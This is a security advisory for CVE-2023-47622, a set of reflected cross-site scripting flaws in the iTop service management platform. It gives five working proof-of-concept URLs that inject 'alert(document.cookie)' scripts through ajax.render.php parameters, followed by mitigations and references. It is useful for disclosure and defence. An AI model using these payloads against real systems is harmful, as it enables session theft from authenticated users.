CVE-2023-47622: Multiple Reflected Cross-Site Scripting Vulnerabilities in IT Service Management platform iTop

Vulnerability Summary

A Reflected Cross-Site Scripting (XSS) vulnerability exists in Combodo iTop version < 3.0.4 and >= 3.1.0, < 3.1.1 in the ajax.render.php endpoint. Several query parameters are improperly sanitized, allowing attackers to inject malicious JavaScript code that is reflected in the response and executed in the context of the victim’s browser.

Reflected XSS vulnerabilities enable attackers to craft malicious links that, when visited by an authenticated user, trigger arbitrary JavaScript execution. This can lead to session hijacking, information theft, or manipulation of user interactions.

Affected Parameters

The following parameters in the ajax.render.php endpoint are vulnerable:

• params[order_by]
• params[limit]
• params[order_direction]
• params[group_by_label]
• params[currentId]

CVSS v3.1 Metrics

Weakness Enumeration

Proof of Concept (PoC)

Authenticated access is required. Replace <TARGET> with your domain or IP and ensure /itop/ is present in the path.

Testing Environment

• iTop version: 3.1.0-2-11973 (built on 2023-08-02 14:25:30)
• MySQL: 10.3.38-MariaDB-0ubuntu0.20.04.1
• PHP: 7.4.3-4ubuntu2.19
• Browsers used for testing:
  • Brave 1.58.137 (Chromium 117.0.5938.153) – 64-bit
  • Firefox 118.0.1 – 64-bit

PoC #1: params[order_by]

http://<TARGET>/itop/pages/ajax.render.php?c[menu]=UserRequest:Overview&filter=["SELECT `UserRequest` FROM UserRequest AS `UserRequest` WHERE (DATE_SUB(NOW(), INTERVAL 14 DAY) < `UserRequest`.`start_date`)",[],[]]&id=block_UserRequestOverview_ID_row0_col0_11&operation=chart&params[aggregation_attribute]=&params[aggregation_function]=count&params[chart_type]=pie&params[currentId]=block_UserRequestOverview_ID_row0_col0_11&params[group_by]=UserRequest.request_type&params[group_by_label]=Request Type&params[limit]=&params[order_by]=function</script><svg><script/class=xss-test>alert(document.cookie)</script>-'&params[order_direction]=desc    

PoC #2: params[limit]

http://<TARGET>/itop/pages/ajax.render.php?c[menu]=UserRequest:Overview&filter=["SELECT `UserRequest` FROM UserRequest AS `UserRequest` WHERE (DATE_SUB(NOW(), INTERVAL 14 DAY) < `UserRequest`.`start_date`)",[],[]]&id=block_UserRequestOverview_ID_row0_col0_11&operation=chart&params[aggregation_attribute]=&params[aggregation_function]=count&params[chart_type]=pie&params[currentId]=block_UserRequestOverview_ID_row0_col0_11&params[group_by]=UserRequest.request_type&params[group_by_label]=Request Type&params[limit]=</ScriPt><sCripT id=xss-test>alert(document.cookie)</sCriPt>&params[order_by]=function&params[order_direction]=desc  

PoC #3: params[order_direction]

http://<TARGET>/itop/pages/ajax.render.php?c[menu]=UserRequest:Overview&filter=["SELECT `UserRequest` FROM UserRequest AS `UserRequest` WHERE (DATE_SUB(NOW(), INTERVAL 14 DAY) < `UserRequest`.`start_date`)",[],[]]&id=block_UserRequestOverview_ID_row0_col0_11&operation=chart&params[aggregation_attribute]=&params[aggregation_function]=count&params[chart_type]=pie&params[currentId]=block_UserRequestOverview_ID_row0_col0_11&params[group_by]=UserRequest.request_type&params[group_by_label]=Request Type&params[limit]=&params[order_by]=function&params[order_direction]=desc</script><svg><script/class=xss-test>alert(document.cookie)</script>-'    

PoC #4: params[group_by_label]

http://<TARGET>/itop/pages/ajax.render.php?c[menu]=UserRequest:Overview&filter=["SELECT `UserRequest` FROM UserRequest AS `UserRequest` WHERE (DATE_SUB(NOW(), INTERVAL 14 DAY) < `UserRequest`.`start_date`)",[],[]]&id=block_UserRequestOverview_ID_row0_col0_11&operation=chart&params[aggregation_attribute]=&params[aggregation_function]=count&params[chart_type]=pie&params[currentId]=block_UserRequestOverview_ID_row0_col0_11&params[group_by]=UserRequest.request_type&params[group_by_label]=Request Type</script><svg><script/class=xss-test>alert(document.cookie)</script>-'&params[limit]=&params[order_by]=function&params[order_direction]=desc  

PoC #5: params[currentId]

http://<TARGET>/itop/pages/ajax.render.php?c[menu]=UserRequest:Overview&filter=["SELECT `UserRequest` FROM UserRequest AS `UserRequest` WHERE (DATE_SUB(NOW(), INTERVAL 14 DAY) < `UserRequest`.`start_date`)",[],[]]&id=block_UserRequestOverview_ID_row0_col0_11&operation=chart&params[aggregation_attribute]=&params[aggregation_function]=count&params[chart_type]=pie&params[currentId]=block_UserRequestOverview_ID_row0_col0_11</script><svg><script/class=xss-test>alert(document.cookie)</script>-'&params[group_by]=UserRequest.request_type&params[group_by_label]=Request Type&params[limit]=&params[order_by]=function&params[order_direction]=desc    

Suggested Mitigations

• Properly encode all dynamic content before rendering in HTML.
• Sanitize user inputs server-side using am HTML sanitization library.
• Implement Content Security Policy (CSP) headers to mitigate script injection.

References

• https://github.com/Combodo/iTop
• https://github.com/Combodo/iTop/security/advisories/GHSA-q9cm-q7fc-frxh
• https://www.cve.org/CVERecord?id=CVE-2023-47622
• https://nvd.nist.gov/vuln/detail/CVE-2023-47622
• https://portswigger.net/web-security/cross-site-scripting/reflected
• https://owasp.org/www-community/attacks/xss/